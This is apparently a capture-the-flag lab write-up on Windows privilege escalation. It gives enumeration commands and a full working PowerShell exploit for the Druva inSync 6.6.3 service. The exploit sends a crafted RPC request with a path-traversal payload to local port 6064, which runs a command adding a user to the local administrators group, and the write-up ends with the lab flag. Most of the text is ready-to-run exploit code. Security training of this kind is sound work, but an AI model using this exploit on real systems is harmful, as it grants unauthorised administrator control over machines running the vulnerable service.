Enumerate installed apps:

wmic product get name

Local ports:

netstat -ano | findstr 6064

Show running services:

get-service | ? {$_.DisplayName -like 'Druva*'}

Writeup

Vulnerable service: Druva inSync 6.6.3

Exploit: https://www.exploit-db.com/exploits/49211

$ErrorActionPreference = "Stop"

$cmd = "net localgroup administrators htb-student /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\Windows\\System32\\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Execute

→Aud1t_th0se_th1rd_paRty_s3rvices!